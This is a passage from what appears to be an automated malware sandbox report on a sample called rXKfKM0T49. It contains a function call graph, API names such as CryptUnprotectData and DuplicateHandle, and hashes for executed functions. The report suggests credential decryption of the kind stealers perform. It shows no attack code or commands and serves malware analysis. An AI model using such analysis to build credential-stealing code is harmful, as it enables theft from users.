40988->40990 40991 38a10a18 GetCurrentThread 40988->40991 40990->40991 40992 38a10a55 GetCurrentProcess 40991->40992 40993 38a10a4e 40991->40993 40994 38a10a8b 40992->40994 40993->40992 41011 38a10f31 40994->41011 41013 38a10b4f 40994->41013 40995 38a10ab3 GetCurrentThreadId 40996 38a10ae4 40995->40996 40996->40984 41000 38a10980 GetCurrentProcess 40999->41000 41002 38a10a18 GetCurrentThread 41000->41002 41005 38a10a11 41000->41005 41003 38a10a55 GetCurrentProcess 41002->41003 41004 38a10a4e 41002->41004 41006 38a10a8b 41003->41006 41004->41003 41005->41002 41009 38a10f31 41006->41009 41010 38a10b4f 2 API calls 41006->41010 41007 38a10ab3 GetCurrentThreadId 41008 38a10ae4 41007->41008 41008->40984 41009->41007 41010->41007 41012 38a10f3a 41011->41012 41012->40995 41017 38a10bc0 41013->41017 41020 38a10bc8 DuplicateHandle 41013->41020 41014 38a10b8e 41014->40995 41018 38a10bc8 DuplicateHandle 41017->41018 41019 38a10c5e 41018->41019 41019->41014 41021 38a10c5e 41020->41021 41021->41014 41023 38a11d58 41022->41023 41024 38a11d66 41023->41024 41026 38a11d98 41023->41026 41025 38a11d6e 41024->41025 41042 38a11dc0 41024->41042 41046 38a11db1 41024->41046 41025->40971 41027 38a117d0 GetCurrentThreadId 41026->41027 41028 38a11da4 41027->41028 41028->40971 41029 38a11dac 41029->40971 41033 38a11d93 41032->41033 41034 38a11d66 41032->41034 41033->41034 41036 38a11d98 41033->41036 41035 38a11d6e 41034->41035 41040 38a11db1 CallWindowProcW 41034->41040 41041 38a11dc0 CallWindowProcW 41034->41041 41035->40971 41037 38a117d0 GetCurrentThreadId 41036->41037 41038 38a11da4 41037->41038 41038->40971 41039 38a11dac 41039->40971 41040->41039 41041->41039 41043 38a11e02 41042->41043 41045 38a11e09 41042->41045 41044 38a11e5a CallWindowProcW 41043->41044 41043->41045 41044->41045 41045->41029 41047 38a11dba 41046->41047 41049 38a11e09 41046->41049 41048 38a11e5a CallWindowProcW 41047->41048 41047->41049 41048->41049 41049->41029 41050 15b158 41057 15b174 41050->41057 41051 15b1a3 41066 38a12720 41051->41066 41072 38a12730 41051->41072 41058 378a0188 41057->41058 41062 378a0198 41057->41062 41059 378a018c 41058->41059 41078 378ac638 41059->41078 41060 378a01da 41060->41051 41063 378a01a4 41062->41063 41065 378ac638 CryptUnprotectData 41063->41065 41064 378a01da 41064->41051 41065->41064 41067 38a1273f 41066->41067 41068 38a10938 10 API calls 41067->41068 41069 38a12746 41068->41069 41110 38a1188c 41069->41110 41073 38a1273f 41072->41073 41074 38a10938 10 API calls 41073->41074 41075 38a12746 41074->41075 41076 38a1188c 15 API calls 41075->41076 41077 15b1b1 41076->41077 41080 378ac66a 41078->41080 41079 378acaf9 41079->41060 41080->41079 41082 378acf01 41080->41082 41083 378acf10 41082->41083 41087 378ad540 41083->41087 41095 378ad550 41083->41095 41084 378acf80 41084->41080 41088 378ad550 41087->41088 41089 378ad629 41088->41089 41093 378ad540 CryptUnprotectData 41088->41093 41094 378ad550 CryptUnprotectData 41088->41094 41103 378ad730 41088->41103 41107 378ad1ec 41089->41107 41093->41089 41094->41089 41096 378ad575 41095->41096 41098 378ad629 41095->41098 41096->41098 41100 378ad730 CryptUnprotectData 41096->41100 41101 378ad540 CryptUnprotectData 41096->41101 41102 378ad550 CryptUnprotectData 41096->41102 41097 378ad1ec CryptUnprotectData 41099 378ad7f5 41097->41099 41098->41097 41099->41084 41100->41098 41101->41098 41102->41098 41104 378ad6fc 41103->41104 41104->41103 41105 378ad1ec CryptUnprotectData 41104->41105 41106 378ad7f5 41105->41106 41106->41089 41108 378ad9e0 CryptUnprotectData 41107->41108 41109 378ad7f5 41108->41109 41109->41084 41112 38a11897 41110->41112 41113 38a12866 41112->41113 41114 38a11934 41112->41114 41117 38a1193f 41114->41117 41115 38a12ed4 41115->41112 41116 38a12e79 41119 38a12ac4 11 API calls 41116->41119 41121 38a12ea9 41116->41121 41117->41115 41117->41116 41125 38a13e40 41117->41125 41119->41121 41120 38a12ec1 41120->41115 41136 38a1d608 41120->41136 41142 38a1d5f8 41120->41142 41121->41115 41130 38a12ac4 41121->41130 41126 38a13e61 41125->41126 41127 38a13e85 41126->41127 41148 38a13fe0 41126->41148 41154 38a13ff0 41126->41154 41127->41116 41132 38a12acf 41130->41132 41131 38a1d0a1 41131->41120 41132->41131 41133 38a10938 10 API calls 41132->41133 41134 38a1d0bb 41133->41134 41229 38a1c544 41134->41229 41138 38a1d66d 41136->41138 41137 38a1d6ba 41137->41115 41138->41137 41139 38a1d899 41138->41139 41236 38a1c60c 41138->41236 41140 38a10938 10 API calls 41139->41140 41140->41137 41147 38a1d608 41142->41147 41143 38a1d899 41144 38a10938 10 API calls 41143->41144 41145 38a1d6ba 41144->41145 41145->41115 41146 38a1c60c DispatchMessageW 41146->41147 41147->41143 41147->41145 41147->41146 41149 38a13ffd 41148->41149 41150 38a10938 10 API calls 41149->41150 41151 38a1402b 41150->41151 41153 38a14036 41151->41153 41160 38a12bec 41151->41160 41153->41127 41158 38a13ffd 41154->41158 41155 38a10938 10 API calls 41156 38a1402b 41155->41156 41157 38a14036 41156->41157 41159 38a12bec 13 API calls 41156->41159 41157->41127 41158->41155 41159->41157 41161 38a12bf7 41160->41161 41163 38a140a8 41161->41163 41164 38a12c20 41161->41164 41163->41163 41165 38a12c2b 41164->41165 41177 38a12c30 41165->41177 41167 38a14517 41185 38a140f8 41167->41185 41169 38a14540 41170 38a14108 3 API calls 41169->41170 41171 38a14547 41170->41171 41174 38a18400 3 API calls 41171->41174 41190 38a19067 41171->41190 41201 38a191f0 41171->41201 41208 38a191d8 41171->41208 41172 38a14551 41172->41163 41174->41172 41178 38a12c3b 41177->41178 41183 38a16c00 3 API calls 41178->41183 41216 38a16c70 41178->41216 41221 38a16bf0 41178->41221 41179 38a157a0 41179->41167 41180 38a13e40 13 API calls 41180->41179 41181 38a15728 41181->41179 41181->41180 41183->41181 41188 38a14103 41185->41188 41187 38a189d3 41187->41169 41189 38a189d8 41188->41189 41225 38a18308 41188->41225 41189->41169 41191 38a19076 41190->41191 41192 38a191c8 41191->41192 41193 38a16e88 3 API calls 41191->41193 41192->41172 41195 38a1910f 41193->41195 41194 38a18400 3 API calls 41194->41195 41195->41194 41197 38a191ea 41195->41197 41196 38a1922d 41196->41172 41197->41196 41198 384efa68 3 API calls 41197->41198 41199 384efab0 3 API calls 41197->41199 41200 384efaa1 3 API calls 41197->41200 41198->41196 41199->41196 41200->41196 41203 38a19221 41201->41203 41204 38a19321 41201->41204 41202 38a1922d 41202->41172 41203->41202 41205 384efa68 3 API calls 41203->41205 41206 384efab0 3 API calls 41203->41206 41207 384efaa1 3 API calls 41203->41207 41204->41172 41205->41204 41206->41204 41207->41204 41209 38a191ea 41208->41209 41210 38a1915d 41208->41210 41211 38a1922d 41209->41211 41213 384efa68 3 API calls 41209->41213 41214 384efab0 3 API calls 41209->41214 41215 384efaa1 3 API calls 41209->41215 41210->41208 41212 38a18400 3 API calls 41210->41212 41211->41172 41212->41210 41213->41211 41214->41211 41215->41211 41217 38a16c0b 41216->41217 41219 38a16c7a 41216->41219 41220 38a16db8 3 API calls 41217->41220 41218 38a16c3e 41218->41181 41219->41181 41220->41218 41222 38a16c0a 41221->41222 41224 38a16db8 3 API calls 41222->41224 41223 38a16c3e 41223->41181 41224->41223 41227 38a18313 41225->41227 41226 38a18b55 41226->41187 41227->41226 41228 38a14108 3 API calls 41227->41228 41228->41226 41230 38a1c54f 41229->41230 41231 38a1d3bb 41230->41231 41233 38a1c560 41230->41233 41231->41131 41234 38a1d3f0 OleInitialize 41233->41234 41235 38a1d454 41234->41235 41235->41231 41237 38a1e6d0 DispatchMessageW 41236->41237 41238 38a1e73c 41237->41238 41238->41138 41239 384ece60 41240 384ece7c 41239->41240 41243 384e94b4 41240->41243 41242 384ece9b 41244 384e94bf 41243->41244 41245 384ecf4f 41244->41245 41248 384ecf68 41244->41248 41252 384ecf59 41244->41252 41245->41242 41250 384ecf7f 41248->41250 41249 384ed021 41250->41249 41251 384e95e8 3 API calls 41250->41251 41251->41249 41254 384ecf67 41252->41254 41253 384ed021 41253->41253 41254->41253 41255 384e95e8 3 API calls 41254->41255 41255->41253

                                                                                                            Executed Functions

                                                                                                            Function 00158DA0 Relevance: 2.4, Strings: 1, Instructions: 1136COMMON
                                                                                                            Download Yara Rule
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2623869181.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_150000_rXKfKM0T49.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: hKy5Ky5
                                                                                                            • API String ID: 0-2049275150
                                                                                                            • Opcode ID: 0e8c426d9457f177031a80c56b2e23326f4e15585ed41e09ac45335ac873d2e8
                                                                                                            • Instruction ID: d750a9cf61b61e97a8a513c21504dbe3140bddabd8a86e3bc9b1ddea64d693db
                                                                                                            • Opcode Fuzzy Hash: 0e8c426d9457f177031a80c56b2e23326f4e15585ed41e09ac45335ac873d2e8
                                                                                                            • Instruction Fuzzy Hash: 47A27F70A04209DFCB15CF68C994AAEBBB2FF88311F158569E825DF261D730ED49CB61
                                                                                                            Function 001560E0 Relevance: 1.6, Strings: 1, Instructions: 336COMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 1554 1560e0-156103 1555 156105-15610b 1554->1555 1556 15610e-15612e 1554->1556 1555->1556 1559 156135-15613c 1556->1559 1560 156130 1556->1560 1562 15613e-156149 1559->1562 1561 1564c4-1564cd 1560->1561 1563 1564d5-1564fb 1562->1563 1564 15614f-156162 1562->1564 1567 156164-156172 1564->1567 1568 156178-156193 1564->1568 1567->1568 1573 15644c-156453 1567->1573 1571 156195-15619b 1568->1571 1572 1561b7-1561ba 1568->1572 1574 1561a4-1561a7 1571->1574 1575 15619d 1571->1575 1577 156314-15631a 1572->1577 1578 1561c0-1561c3 1572->1578 1573->1561 1576 156455-156457 1573->1576 1580 1561da-1561e0 1574->1580 1581 1561a9-1561ac 1574->1581 1575->1574 1575->1577 1579 156406-156409 1575->1579 1575->1580 1582 156466-15646c 1576->1582 1583 156459-15645e 1576->1583 1577->1579 1584 156320-156325 1577->1584 1578->1577 1585 1561c9-1561cf 1578->1585 1590 1564d0 1579->1590 1591 15640f-156415 1579->1591 1592 1561e6-1561e8 1580->1592 1593 1561e2-1561e4 1580->1593 1586 156246-15624c 1581->1586 1587 1561b2 1581->1587 1582->1563 1588 15646e-156473 1582->1588 1583->1582 1584->1579 1585->1577 1589 1561d5 1585->1589 1586->1579 1596 156252-156258 1586->1596 1587->1579 1594 156475-15647a 1588->1594 1595 1564b8-1564bb 1588->1595 1589->1579 1590->1563 1597 156417-15641f 1591->1597 1598 15643a-15643e 1591->1598 1599 1561f2-1561fb 1592->1599 1593->1599 1594->1590 1604 15647c 1594->1604 1595->1590 1603 1564bd-1564c2 1595->1603 1605 15625e-156260 1596->1605 1606 15625a-15625c 1596->1606 1597->1563 1607 156425-156434 1597->1607 1598->1573 1602 156440-156446 1598->1602 1600 1561fd-156208 1599->1600 1601 15620e-156236 1599->1601 1600->1579 1600->1601 1627 15623c-156241 1601->1627 1628 15632a-156360 1601->1628 1602->1562 1602->1573 1603->1561 1603->1576 1608 156483-156488 1604->1608 1609 15626a-156281 1605->1609 1606->1609 1607->1568 1607->1598 1613 1564aa-1564ac 1608->1613 1614 15648a-15648c 1608->1614 1620 156283-15629c 1609->1620 1621 1562ac-1562d3 1609->1621 1613->1590 1616 1564ae-1564b1 1613->1616 1617 15648e-156493 1614->1617 1618 15649b-1564a1 1614->1618 1616->1595 1617->1618 1618->1563 1619 1564a3-1564a8 1618->1619 1619->1613 1623 15647e-156481 1619->1623 1620->1628 1631 1562a2-1562a7 1620->1631 1621->1590 1633 1562d9-1562dc 1621->1633 1623->1590 1623->1608 1627->1628 1634 156362-156366 1628->1634 1635 15636d-156375 1628->1635 1631->1628 1633->1590 1636 1562e2-15630b 1633->1636 1637 156385-156389 1634->1637 1638 156368-15636b 1634->1638 1635->1590 1639 15637b-156380 1635->1639 1636->1628 1651 15630d-156312 1636->1651 1641 1563a8-1563ac 1637->1641 1642 15638b-156391 1637->1642 1638->1635 1638->1637 1639->1579 1644 1563b6-1563d5 call 1566b8 1641->1644 1645 1563ae-1563b4 1641->1645 1642->1641 1643 156393-15639b 1642->1643 1643->1590 1647 1563a1-1563a6 1643->1647 1648 1563db-1563df 1644->1648 1645->1644 1645->1648 1647->1579 1648->1579 1649 1563e1-1563fd 1648->1649 1649->1579 1651->1628
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2623869181.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_150000_rXKfKM0T49.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: Ny5$Oy5xOy5
                                                                                                            • API String ID: 0-4294424330
                                                                                                            • Opcode ID: 8ab0ef47273be179d8cac9bf292b7dc1d30316aac240fdd3fbfdb22d7f201b15
                                                                                                            • Instruction ID: a6959c8b307ed689a8777cb54a22e027f8b92e0efd651ce94d4a39a97a866fd3
                                                                                                            • Opcode Fuzzy Hash: 8ab0ef47273be179d8cac9bf292b7dc1d30316aac240fdd3fbfdb22d7f201b15
                                                                                                            • Instruction Fuzzy Hash: 6AD14F30A00119DFCB54CFA9C984AADBBB2FF98316F958165E825AF261DB30DD45CB90
                                                                                                            Function 378AD9D9 Relevance: 1.6, APIs: 1, Instructions: 56encryptionCOMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 1678 378ad9d9-378ad9de 1679 378ad9e0-378ada52 CryptUnprotectData 1678->1679 1680 378ada5b-378ada83 1679->1680 1681 378ada54-378ada5a 1679->1681 1681->1680
                                                                                                            APIs
                                                                                                            • CryptUnprotectData.CRYPT32(0000004D,?,00000000,?,?,?,?), ref: 378ADA45
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2652426334.00000000378A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 378A0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_378a0000_rXKfKM0T49.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CryptDataUnprotect
                                                                                                            • String ID:
                                                                                                            • API String ID: 834300711-0
                                                                                                            • Opcode ID: 69e1778c625ee661c113edae90ceae9c9847972653d0095b2d5e985897c447b9
                                                                                                            • Instruction ID: bf09eb0fcb61f46bf260f7629b591d7578ffa43767eb005de1e659ee38617999
                                                                                                            • Opcode Fuzzy Hash: 69e1778c625ee661c113edae90ceae9c9847972653d0095b2d5e985897c447b9
                                                                                                            • Instruction Fuzzy Hash: 7D1167B2800249DFCF10CF9AC844BDEBBF4EF48320F14842AE958A7211C339A590CFA5
                                                                                                            Function 378AD1EC Relevance: 1.6, APIs: 1, Instructions: 55encryptionCOMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 1684 378ad1ec-378ada52 CryptUnprotectData 1686 378ada5b-378ada83 1684->1686 1687 378ada54-378ada5a 1684->1687 1687->1686
                                                                                                            APIs
                                                                                                            • CryptUnprotectData.CRYPT32(0000004D,?,00000000,?,?,?,?), ref: 378ADA45
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2652426334.00000000378A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 378A0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_378a0000_rXKfKM0T49.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CryptDataUnprotect
                                                                                                            • String ID:
                                                                                                            • API String ID: 834300711-0
                                                                                                            • Opcode ID: 27ba8ebbfd8ba184dc208e4e9d8fb97a6c074871e2cd5707db42a5debe7dc82e
                                                                                                            • Instruction ID: 46718abb8d211c04b5538c4fc344de3733f08a46a2563bbec2be4adc05bd4538
                                                                                                            • Opcode Fuzzy Hash: 27ba8ebbfd8ba184dc208e4e9d8fb97a6c074871e2cd5707db42a5debe7dc82e
                                                                                                            • Instruction Fuzzy Hash: 881159B2800349EFDB10CF9AC405BEEBBF4EB48320F148429E554A7211C775A554CFA5
                                                                                                            Function 378A0C1B Relevance: 1.5, Strings: 1, Instructions: 244COMMON
                                                                                                            Download Yara Rule
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2652426334.00000000378A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 378A0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_378a0000_rXKfKM0T49.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: s5
                                                                                                            • API String ID: 0-1057577681
                                                                                                            • Opcode ID: 963a2e8b165512567a2a999b26de567d3c7d9364985dd5e3c816f7df88852664
                                                                                                            • Instruction ID: 1e1f9c83326d84d15a6be35900643bd0b76eabfcef9b150821012ae8347ea2b3
                                                                                                            • Opcode Fuzzy Hash: 963a2e8b165512567a2a999b26de567d3c7d9364985dd5e3c816f7df88852664
                                                                                                            • Instruction Fuzzy Hash: 7EA11674D00208CFEB14DFA4C988BDDBBB1BF89311F208269E448BB291DB75A985CF55
                                                                                                            Function 378A0C28 Relevance: 1.5, Strings: 1, Instructions: 220COMMON
                                                                                                            Download Yara Rule
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2652426334.00000000378A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 378A0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_378a0000_rXKfKM0T49.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: s5
                                                                                                            • API String ID: 0-1057577681
                                                                                                            • Opcode ID: 81f8081236876a2b75202bf6056dfe09e436958ae6df0a952d71be52f4ba03f1
                                                                                                            • Instruction ID: 1b54e329bbf4e6829f7ce6930175e06863c1977dcbef04fde250f6c447506df0
                                                                                                            • Opcode Fuzzy Hash: 81f8081236876a2b75202bf6056dfe09e436958ae6df0a952d71be52f4ba03f1
                                                                                                            • Instruction Fuzzy Hash: 07A11570D00208CFEB14DFA9C988BDDBBB1BF89311F208269E418BB291DB759985CF55
                                                                                                            Function 38A1E790 Relevance: .8, Instructions: 764COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2654135806.0000000038A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 38A10000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_38a10000_rXKfKM0T49.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 730533ebe386401bab3609200cdda5edcf35000a3262cdb8e9bd6c83ce3c642e
                                                                                                            • Instruction ID: c11194f3224096f742edd94aaada1b9463ea7fbd1f9be187e2b75f821f6e7212
                                                                                                            • Opcode Fuzzy Hash: 730533ebe386401bab3609200cdda5edcf35000a3262cdb8e9bd6c83ce3c642e
                                                                                                            • Instruction Fuzzy Hash: 1082C274A00229CFDB25DF65C894BA9B7B2FB89300F5081E9D90AB7351DB319E82DF50
                                                                                                            Function 384EBDF0 Relevance: .8, Instructions: 758COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2653950437.00000000384E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 384E0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_384e0000_rXKfKM0T49.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: c536e044520419ad2ebe21999809e3d8a7672cd2890ee5aba7f8581f2a86ef2c
                                                                                                            • Instruction ID: 34346a6d3bb89cf048d02f0455ccb441773f5d562ba9f4d2a98a7169d51d4f3a
                                                                                                            • Opcode Fuzzy Hash: c536e044520419ad2ebe21999809e3d8a7672cd2890ee5aba7f8581f2a86ef2c
                                                                                                            • Instruction Fuzzy Hash: 7272D274A01218CFDB25DF65C994BA9B7B2FB89301F5081E9D909B7361CB319E82DF50
                                                                                                            Function 384E8650 Relevance: .7, Instructions: 709COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2653950437.00000000384E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 384E0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_384e0000_rXKfKM0T49.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: d908e187c43445842c745d5f53f391b55d205b22b8666940020daf47611aa798
                                                                                                            • Instruction ID: ce3868f7eba1afe9c0609d53d5b06ad61659f56a843ff50a8422b258062ea8f5
                                                                                                            • Opcode Fuzzy Hash: d908e187c43445842c745d5f53f391b55d205b22b8666940020daf47611aa798
                                                                                                            • Instruction Fuzzy Hash: 2D72A274E01229CFEB64DF69C984BD9BBB2BB49301F5481E9D448A7351DB34AE81CF90
                                                                                                            Function 001566B8 Relevance: .5, Instructions: 473COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2623869181.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_150000_rXKfKM0T49.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: e3da87ab261c56ae1e3fd5ed7cdfd360c8ae33c3c8ccd70891ec36c744609f4d
                                                                                                            • Instruction ID: eff4a302c5d7b40cfd36add722824fe3e3b7dd04ba04c9d9e43849fe7e5ff3e0
                                                                                                            • Opcode Fuzzy Hash: e3da87ab261c56ae1e3fd5ed7cdfd360c8ae33c3c8ccd70891ec36c744609f4d
                                                                                                            • Instruction Fuzzy Hash: E8126C30A00208DFCB14CF69D994AAEBBF2FF48315F558559E865EB261DB30ED45CB90
                                                                                                            Function 378AC638 Relevance: .3, Instructions: 301COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2652426334.00000000378A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 378A0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_378a0000_rXKfKM0T49.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 8d9b34a59caa1c71481a4cc895e9e274ed6c3981fecda782bcc1b8d4ee669d5d
                                                                                                            • Instruction ID: 3d642a2510bce0ddfad9f7ff5de88f392225ea24014fb2fd20f6126c17a3450e
                                                                                                            • Opcode Fuzzy Hash: 8d9b34a59caa1c71481a4cc895e9e274ed6c3981fecda782bcc1b8d4ee669d5d
                                                                                                            • Instruction Fuzzy Hash: 61E1F074E01218CFEB64CFA9C994B9DBBB2BF89300F2081A9D419B7391DB355A85CF51
                                                                                                            Function 384E67C0 Relevance: .3, Instructions: 268COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2653950437.00000000384E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 384E0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_384e0000_rXKfKM0T49.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 6d81b503c8a97446f2633a7606aeff0950de26e53d4c83e54463ff6e321ec16b
                                                                                                            • Instruction ID: 3a514471735f18697b0fe1e9329bda93832017a65c596cfbe01fd5cf2269f521
                                                                                                            • Opcode Fuzzy Hash: 6d81b503c8a97446f2633a7606aeff0950de26e53d4c83e54463ff6e321ec16b
                                                                                                            • Instruction Fuzzy Hash: 71C1CE74E00318CFDB54DFA5C994B9DBBB2AF89300F5080A9D819AB355DB359E85CF10
                                                                                                            Function 378A03C4 Relevance: .3, Instructions: 265COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2652426334.00000000378A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 378A0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_378a0000_rXKfKM0T49.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 1e4cb0c8654eaaf44c6ee101439f4930a59932b48047ef29ccd5d1b28a715d5a
                                                                                                            • Instruction ID: fc3b523d878c0d6ded2be809b68f12d550e80d81d6ab203acc78e5edfc575baf
                                                                                                            • Opcode Fuzzy Hash: 1e4cb0c8654eaaf44c6ee101439f4930a59932b48047ef29ccd5d1b28a715d5a
                                                                                                            • Instruction Fuzzy Hash: 33C1AE74E00318CFEB54DFA5C994BADBBB2BB88301F5080A9D809AB355EB355E85CF50
                                                                                                            Function 384EB896 Relevance: .3, Instructions: 261COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2653950437.00000000384E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 384E0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_384e0000_rXKfKM0T49.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 86f1f806fc2574095b8ef2bd0baa66068bc0b1751862cf7f700c21adefc47364
                                                                                                            • Instruction ID: 3a28ca8e3f53496e8720d7db847370ecb688b0e21004d77a878d367958b561a1
                                                                                                            • Opcode Fuzzy Hash: 86f1f806fc2574095b8ef2bd0baa66068bc0b1751862cf7f700c21adefc47364
                                                                                                            • Instruction Fuzzy Hash: AFA19CB0D0A388CFEB29CFB5C9906CDBBF2AF49301F5884AAD454BB755D6305886CB51
                                                                                                            Function 384EA360 Relevance: .2, Instructions: 219COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2653950437.00000000384E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 384E0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_384e0000_rXKfKM0T49.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: d620d615fc6b99bf9bea3749d529acd02338ecf284c5cfa992cbed23dcda4e54
                                                                                                            • Instruction ID: 121f1739f007b5f657ea9ac7851edb5fae212aa50977cd1bc2d0758510e3bcfd
                                                                                                            • Opcode Fuzzy Hash: d620d615fc6b99bf9bea3749d529acd02338ecf284c5cfa992cbed23dcda4e54
                                                                                                            • Instruction Fuzzy Hash: DBA171B5E01228CFEB18CF6AC944B9DFBF2AF89301F54C1AAD408A7255DB345A85CF51
                                                                                                            Function 384E9D10 Relevance: .2, Instructions: 219COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2653950437.00000000384E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 384E0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_384e0000_rXKfKM0T49.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 0fca00c3616f978e14f813d86c204f56e9f0a3ff9aa76648650d72d324d2a85b
                                                                                                            • Instruction ID: b703dcc4df4964c52869790232b9c239d6260be9b4e1366e37905df4659d37a8
                                                                                                            • Opcode Fuzzy Hash: 0fca00c3616f978e14f813d86c204f56e9f0a3ff9aa76648650d72d324d2a85b
                                                                                                            • Instruction Fuzzy Hash: DDA183B4E01228CFEB18CF6AC944B9DBBF2BF89301F14C1AAD448A7255DB745A85CF51
                                                                                                            Function 384EA9B0 Relevance: .2, Instructions: 218COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2653950437.00000000384E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 384E0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_384e0000_rXKfKM0T49.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
